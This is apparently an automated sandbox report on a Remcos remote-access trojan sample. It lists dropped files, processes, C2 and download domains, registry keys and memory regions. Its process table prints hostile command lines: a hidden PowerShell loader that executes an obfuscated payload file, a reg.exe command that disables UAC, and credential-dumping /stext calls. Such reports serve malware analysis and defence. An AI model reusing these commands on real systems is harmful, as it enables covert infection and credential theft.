Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Cp91KTtA1I.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Programdirektrer.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Programdirektrer.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsr817A.tmp\BgImage.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsr817A.tmp\UserInfo.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsr817A.tmp\nsDialogs.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Psychrometres.Tel
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xe7502af0, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urghzopx.1kf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwpiloe4.kzy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv9412.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x9f59b020, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nkgriyijgstgfl
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
modified
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Farvebaandsomskifteren.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Koghedt\Wafery.unt
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Koghedt\barsel.pul
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Koghedt\migraines.sla
|
PGP symmetric key encrypted data - Plaintext or unencrypted data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Koghedt\tegnmssig.bra
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Koghedt\tradionsbevarende.unp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Montanes176.opt
|
Matlab v4 mat-file (little endian) \303, text, rows 1202847744, columns 285212672
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Triboluminescence.Kan
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 16 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\Cp91KTtA1I.exe
|
"C:\Users\user\Desktop\Cp91KTtA1I.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Aksemagters=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Psychrometres.Tel';$Soonerdog=$Aksemagters.SubString(4665,3);.$Soonerdog($Aksemagters)"
|
||
C:\Users\user\AppData\Local\Temp\Programdirektrer.exe
|
"C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe"
|
||
C:\Windows\SysWOW64\reg.exe
|
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
||
C:\Users\user\AppData\Local\Temp\Programdirektrer.exe
|
C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe /stext "C:\Users\user\AppData\Local\Temp\nkgriyijgstgfl"
|
||
C:\Users\user\AppData\Local\Temp\Programdirektrer.exe
|
C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe /stext "C:\Users\user\AppData\Local\Temp\xeukirtluallizflkm"
|
||
C:\Users\user\AppData\Local\Temp\Programdirektrer.exe
|
C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe /stext "C:\Users\user\AppData\Local\Temp\igzujjdfqjdysfbpbxskn"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
a458386d9.duckdns.org
|
|||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://geoplugin.net/json.gpa
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://www.microsoft.q
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://geoplugin.net/json.gp3
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://drive.usercontent.google.com/
|
unknown
|
||
https://drive.google.com/dn-j8
|
unknown
|
||
http://www.imvu.comppData
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://www.google.com
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
https://drive.usercontent.google.com/N
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://drive.google.com/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 26 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
a458386d9.duckdns.org
|
217.76.50.73
|
||
geoplugin.net
|
178.237.33.50
|
||
drive.google.com
|
142.250.184.238
|
||
drive.usercontent.google.com
|
142.250.184.193
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
217.76.50.73
|
a458386d9.duckdns.org
|
Sweden
|
||
142.250.184.193
|
drive.usercontent.google.com
|
United States
|
||
142.250.184.238
|
drive.google.com
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
|
EnableLUA
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
time
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
4456000
|
heap
|
page read and write
|
||
4473000
|
heap
|
page read and write
|
||
A6B6000
|
direct allocation
|
page execute and read and write
|
||
A55000
|
heap
|
page read and write
|
||
8430000
|
trusted library allocation
|
page read and write
|
||
4200000
|
direct allocation
|
page read and write
|
||
6F0000
|
heap
|
page read and write
|
||
430000
|
heap
|
page read and write
|
||
76A3000
|
heap
|
page read and write
|
||
62C000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
B0B6000
|
direct allocation
|
page execute and read and write
|
||
20EE7000
|
heap
|
page read and write
|
||
AB9000
|
heap
|
page read and write
|
||
23384CC0000
|
trusted library allocation
|
page read and write
|
||
691CF7E000
|
unkown
|
page readonly
|
||
645000
|
heap
|
page read and write
|
||
20E6C000
|
heap
|
page read and write
|
||
7120000
|
direct allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
5EE000
|
stack
|
page read and write
|
||
75C0000
|
trusted library allocation
|
page execute and read and write
|
||
A99000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
177000
|
stack
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
44FA000
|
heap
|
page read and write
|
||
233806A0000
|
trusted library allocation
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
3F96000
|
remote allocation
|
page execute and read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2337F7F0000
|
trusted library section
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
20E87000
|
heap
|
page read and write
|
||
20D20000
|
heap
|
page read and write
|
||
A55000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
691C97E000
|
unkown
|
page readonly
|
||
7100000
|
direct allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
4507000
|
heap
|
page read and write
|
||
691CFFE000
|
stack
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
401000
|
unkown
|
page execute read
|
||
840000
|
heap
|
page read and write
|
||
8560000
|
trusted library allocation
|
page read and write
|
||
A76000
|
heap
|
page read and write
|
||
632000
|
heap
|
page read and write
|
||
727000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
7980000
|
trusted library allocation
|
page read and write
|
||
23384D60000
|
trusted library allocation
|
page read and write
|
||
7A20000
|
trusted library allocation
|
page read and write
|
||
4418000
|
heap
|
page read and write
|
||
A4C000
|
heap
|
page read and write
|
||
767F000
|
heap
|
page read and write
|
||
2007C000
|
stack
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
2002F000
|
stack
|
page read and write
|
||
3083000
|
trusted library allocation
|
page execute and read and write
|
||
644000
|
heap
|
page read and write
|
||
7160000
|
direct allocation
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
691C17E000
|
unkown
|
page readonly
|
||
23384EE7000
|
heap
|
page read and write
|
||
8A30000
|
trusted library allocation
|
page execute and read and write
|
||
644000
|
heap
|
page read and write
|
||
691BAEB000
|
stack
|
page read and write
|
||
7F3C0000
|
trusted library allocation
|
page execute and read and write
|
||
A61000
|
heap
|
page read and write
|
||
23384EE3000
|
heap
|
page read and write
|
||
AA2000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
691CC7E000
|
unkown
|
page readonly
|
||
203FF000
|
stack
|
page read and write
|
||
21340000
|
unclassified section
|
page execute and read and write
|
||
44D7000
|
heap
|
page read and write
|
||
3174000
|
heap
|
page read and write
|
||
32AE000
|
stack
|
page read and write
|
||
75B0000
|
trusted library allocation
|
page read and write
|
||
20C73000
|
heap
|
page read and write
|
||
46E0000
|
heap
|
page read and write
|
||
1FFB0000
|
remote allocation
|
page read and write
|
||
44C3000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
20E6C000
|
heap
|
page read and write
|
||
76E1000
|
heap
|
page read and write
|
||
1FF4D000
|
stack
|
page read and write
|
||
A69000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
4150000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
20E4F000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
5B5000
|
heap
|
page read and write
|
||
32EE000
|
stack
|
page read and write
|
||
2861000
|
heap
|
page read and write
|
||
202BF000
|
stack
|
page read and write
|
||
4670000
|
direct allocation
|
page read and write
|
||
3099000
|
trusted library allocation
|
page read and write
|
||
4690000
|
direct allocation
|
page read and write
|
||
749E000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
448A000
|
heap
|
page read and write
|
||
233808D0000
|
trusted library section
|
page readonly
|
||
A61000
|
heap
|
page read and write
|
||
20E60000
|
heap
|
page read and write
|
||
82E000
|
stack
|
page read and write
|
||
23384E96000
|
heap
|
page read and write
|
||
2337F82B000
|
heap
|
page read and write
|
||
23384EFA000
|
heap
|
page read and write
|
||
A69000
|
heap
|
page read and write
|
||
A56000
|
heap
|
page read and write
|
||
92B6000
|
direct allocation
|
page execute and read and write
|
||
704AD000
|
unkown
|
page read and write
|
||
2337F879000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
5F0000
|
heap
|
page read and write
|
||
7150000
|
direct allocation
|
page read and write
|
||
A4C000
|
heap
|
page read and write
|
||
2337F929000
|
heap
|
page read and write
|
||
3115000
|
heap
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
39E000
|
stack
|
page read and write
|
||
16C0000
|
remote allocation
|
page execute and read and write
|
||
2337F6D0000
|
heap
|
page read and write
|
||
874C000
|
heap
|
page read and write
|
||
691D1FE000
|
stack
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
23385030000
|
remote allocation
|
page read and write
|
||
4D07000
|
trusted library allocation
|
page read and write
|
||
A79000
|
heap
|
page read and write
|
||
B99000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
A50000
|
heap
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
23380291000
|
trusted library allocation
|
page read and write
|
||
2861000
|
heap
|
page read and write
|
||
20D20000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
438000
|
unkown
|
page read and write
|
||
44D2000
|
heap
|
page read and write
|
||
17C000
|
stack
|
page read and write
|
||
7170000
|
direct allocation
|
page read and write
|
||
222F000
|
stack
|
page read and write
|
||
2AD000
|
stack
|
page read and write
|
||
1FE0F000
|
stack
|
page read and write
|
||
44F7000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
92F000
|
stack
|
page read and write
|
||
868A000
|
heap
|
page read and write
|
||
691D07E000
|
unkown
|
page readonly
|
||
A51000
|
heap
|
page read and write
|
||
44FA000
|
heap
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
A88000
|
heap
|
page read and write
|
||
A9A000
|
heap
|
page read and write
|
||
2337F873000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
44F7000
|
heap
|
page read and write
|
||
77F0000
|
trusted library allocation
|
page read and write
|
||
877A000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
1FB6D000
|
stack
|
page read and write
|
||
44D2000
|
heap
|
page read and write
|
||
A65000
|
heap
|
page read and write
|
||
286B000
|
heap
|
page read and write
|
||
3389000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
2410000
|
heap
|
page read and write
|
||
44D8000
|
heap
|
page read and write
|
||
A59000
|
heap
|
page read and write
|
||
20E4F000
|
heap
|
page read and write
|
||
20D1B000
|
heap
|
page read and write
|
||
70490000
|
unkown
|
page readonly
|
||
23384EF4000
|
heap
|
page read and write
|
||
897C000
|
stack
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
4D00000
|
trusted library allocation
|
page read and write
|
||
233808F0000
|
trusted library section
|
page readonly
|
||
A5E000
|
heap
|
page read and write
|
||
20D1B000
|
heap
|
page read and write
|
||
CFE000
|
stack
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
620F000
|
trusted library allocation
|
page read and write
|
||
23384CD4000
|
trusted library allocation
|
page read and write
|
||
3040000
|
heap
|
page read and write
|
||
1FFB0000
|
remote allocation
|
page read and write
|
||
A79000
|
heap
|
page read and write
|
||
3596000
|
remote allocation
|
page execute and read and write
|
||
691C77E000
|
unkown
|
page readonly
|
||
644000
|
heap
|
page read and write
|
||
44F7000
|
heap
|
page read and write
|
||
2B96000
|
remote allocation
|
page execute and read and write
|
||
30AA000
|
trusted library allocation
|
page execute and read and write
|
||
20E00000
|
heap
|
page read and write
|
||
238F000
|
stack
|
page read and write
|
||
80F000
|
stack
|
page read and write
|
||
44FF000
|
heap
|
page read and write
|
||
23384ECA000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
6089000
|
trusted library allocation
|
page read and write
|
||
20EA9000
|
heap
|
page read and write
|
||
20DD6000
|
unclassified section
|
page execute and read and write
|
||
3080000
|
trusted library allocation
|
page read and write
|
||
20E8A000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
4CAE000
|
stack
|
page read and write
|
||
86A6000
|
heap
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
20E31000
|
heap
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
79F0000
|
trusted library allocation
|
page read and write
|
||
336E000
|
stack
|
page read and write
|
||
728000
|
heap
|
page read and write
|
||
691C57E000
|
unkown
|
page readonly
|
||
448A000
|
heap
|
page read and write
|
||
51B7000
|
trusted library allocation
|
page read and write
|
||
24F1000
|
heap
|
page read and write
|
||
A65000
|
heap
|
page read and write
|
||
23384EEB000
|
heap
|
page read and write
|
||
1FA2F000
|
stack
|
page read and write
|
||
2230000
|
heap
|
page read and write
|
||
42F0000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
644000
|
heap
|
page read and write
|
||
3205000
|
heap
|
page read and write
|
||
332C000
|
stack
|
page read and write
|
||
8717000
|
heap
|
page read and write
|
||
44C3000
|
heap
|
page read and write
|
||
1FEE000
|
stack
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
A49000
|
heap
|
page read and write
|
||
A4E000
|
heap
|
page read and write
|
||
23384C90000
|
trusted library allocation
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
691D9FE000
|
stack
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
D10000
|
heap
|
page read and write
|
||
70C0000
|
direct allocation
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
3210000
|
trusted library allocation
|
page execute and read and write
|
||
233807D0000
|
trusted library allocation
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
2510000
|
heap
|
page read and write
|
||
2440000
|
trusted library allocation
|
page read and write
|
||
7110000
|
direct allocation
|
page read and write
|
||
75A0000
|
heap
|
page execute and read and write
|
||
70E0000
|
direct allocation
|
page read and write
|
||
23384EFC000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
ABB000
|
heap
|
page read and write
|
||
691C077000
|
stack
|
page read and write
|
||
8590000
|
trusted library allocation
|
page read and write
|
||
23384EE6000
|
heap
|
page read and write
|
||
6FA000
|
heap
|
page read and write
|
||
3112000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
691CA7B000
|
stack
|
page read and write
|
||
A49000
|
heap
|
page read and write
|
||
23380540000
|
trusted library allocation
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
20B80000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
AD7000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
7800000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
7180000
|
direct allocation
|
page read and write
|
||
2C60000
|
trusted library allocation
|
page read and write
|
||
2337F843000
|
heap
|
page read and write
|
||
23384C80000
|
trusted library allocation
|
page read and write
|
||
1FF8000
|
heap
|
page read and write
|
||
5FC000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2A5F000
|
stack
|
page read and write
|
||
BA0000
|
heap
|
page read and write
|
||
2057D000
|
stack
|
page read and write
|
||
26EF000
|
stack
|
page read and write
|
||
650000
|
trusted library allocation
|
page read and write
|
||
B5E000
|
stack
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
2860000
|
heap
|
page read and write
|
||
4216000
|
heap
|
page read and write
|
||
76AA000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
472E000
|
stack
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
A61000
|
heap
|
page read and write
|
||
2337F8A0000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
A69000
|
heap
|
page read and write
|
||
43E000
|
unkown
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
23380100000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
5B0000
|
heap
|
page read and write
|
||
3202000
|
heap
|
page read and write
|
||
691D0FE000
|
stack
|
page read and write
|
||
7618000
|
heap
|
page read and write
|
||
7990000
|
trusted library allocation
|
page read and write
|
||
760D000
|
heap
|
page read and write
|
||
44D8000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
2D80000
|
heap
|
page read and write
|
||
A55000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
44DF000
|
heap
|
page read and write
|
||
3060000
|
trusted library section
|
page read and write
|
||
20E60000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
20EB2000
|
heap
|
page read and write
|
||
23384E2C000
|
heap
|
page read and write
|
||
81E000
|
stack
|
page read and write
|
||
1FE4E000
|
stack
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
89BE000
|
stack
|
page read and write
|
||
30D0000
|
trusted library allocation
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
42C000
|
unkown
|
page read and write
|
||
23380015000
|
heap
|
page read and write
|
||
43F0000
|
direct allocation
|
page read and write
|
||
76B6000
|
heap
|
page read and write
|
||
691C27E000
|
stack
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
6F8000
|
heap
|
page read and write
|
||
1FCAF000
|
stack
|
page read and write
|
||
23380900000
|
trusted library section
|
page readonly
|
||
A63000
|
heap
|
page read and write
|
||
A59000
|
heap
|
page read and write
|
||
23384E62000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
23384D60000
|
trusted library allocation
|
page read and write
|
||
2337FFD1000
|
trusted library allocation
|
page read and write
|
||
A74000
|
heap
|
page read and write
|
||
5BE000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
A5E000
|
heap
|
page read and write
|
||
745E000
|
stack
|
page read and write
|
||
24F0000
|
heap
|
page read and write
|
||
79D0000
|
trusted library allocation
|
page read and write
|
||
3118000
|
heap
|
page read and write
|
||
2347000
|
heap
|
page read and write
|
||
23384E93000
|
heap
|
page read and write
|
||
78DE000
|
stack
|
page read and write
|
||
243F000
|
stack
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
B2D000
|
stack
|
page read and write
|
||
84D000
|
heap
|
page read and write
|
||
30F8000
|
trusted library allocation
|
page read and write
|
||
AB9000
|
heap
|
page read and write
|
||
44CC000
|
heap
|
page read and write
|
||
A59000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
23384EC6000
|
heap
|
page read and write
|
||
5F3000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
21371000
|
direct allocation
|
page execute and read and write
|
||
4D17000
|
heap
|
page read and write
|
||
59E000
|
stack
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
42A000
|
unkown
|
page read and write
|
||
447E000
|
heap
|
page read and write
|
||
23384C91000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
691CEFE000
|
stack
|
page read and write
|
||
3090000
|
trusted library allocation
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
44DF000
|
heap
|
page read and write
|
||
23384D70000
|
trusted library allocation
|
page read and write
|
||
2861000
|
heap
|
page read and write
|
||
691D27E000
|
unkown
|
page readonly
|
||
202FC000
|
stack
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
4C6F000
|
stack
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
7666000
|
heap
|
page read and write
|
||
A91000
|
heap
|
page read and write
|
||
279E000
|
stack
|
page read and write
|
||
BAB6000
|
direct allocation
|
page execute and read and write
|
||
79B0000
|
trusted library allocation
|
page read and write
|
||
44E6000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
8400000
|
heap
|
page read and write
|
||
A4C000
|
heap
|
page read and write
|
||
2D3D000
|
stack
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
30B0000
|
trusted library allocation
|
page read and write
|
||
893C000
|
stack
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
A69000
|
heap
|
page read and write
|
||
691DA7E000
|
unkown
|
page readonly
|
||
2090F000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
23384DE0000
|
trusted library allocation
|
page read and write
|
||
23384F02000
|
heap
|
page read and write
|
||
2337F895000
|
heap
|
page read and write
|
||
2053F000
|
stack
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
1FFEE000
|
stack
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
8719000
|
heap
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
4650000
|
direct allocation
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
193000
|
stack
|
page read and write
|
||
74F000
|
stack
|
page read and write
|
||
23384CC0000
|
trusted library allocation
|
page read and write
|
||
691CCFE000
|
stack
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
72B000
|
heap
|
page read and write
|
||
23385030000
|
remote allocation
|
page read and write
|
||
3DF000
|
stack
|
page read and write
|
||
435000
|
unkown
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
4660000
|
direct allocation
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
A63000
|
heap
|
page read and write
|
||
23384DD0000
|
trusted library allocation
|
page read and write
|
||
70E000
|
stack
|
page read and write
|
||
2337F85B000
|
heap
|
page read and write
|
||
691C87B000
|
stack
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
A6E000
|
heap
|
page read and write
|
||
21386000
|
direct allocation
|
page execute and read and write
|
||
A49000
|
heap
|
page read and write
|
||
8A10000
|
trusted library allocation
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
44D9000
|
heap
|
page read and write
|
||
D5E000
|
stack
|
page read and write
|
||
A4D000
|
heap
|
page read and write
|
||
691D379000
|
stack
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
30E0000
|
heap
|
page readonly
|
||
644000
|
heap
|
page read and write
|
||
20B81000
|
heap
|
page read and write
|
||
20E6C000
|
heap
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
7A6B000
|
stack
|
page read and write
|
||
84DF000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
B9A000
|
heap
|
page read and write
|
||
704A6000
|
unkown
|
page readonly
|
||
23384F0A000
|
heap
|
page read and write
|
||
23384E43000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
A61000
|
heap
|
page read and write
|
||
30B2000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
20E31000
|
heap
|
page read and write
|
||
8A20000
|
direct allocation
|
page execute and read and write
|
||
1FBAE000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
2C60000
|
trusted library allocation
|
page read and write
|
||
2338011A000
|
heap
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
4C2E000
|
stack
|
page read and write
|
||
83F7000
|
stack
|
page read and write
|
||
A6E000
|
heap
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
A41000
|
heap
|
page read and write
|
||
314A000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
20E6C000
|
heap
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
AD0000
|
heap
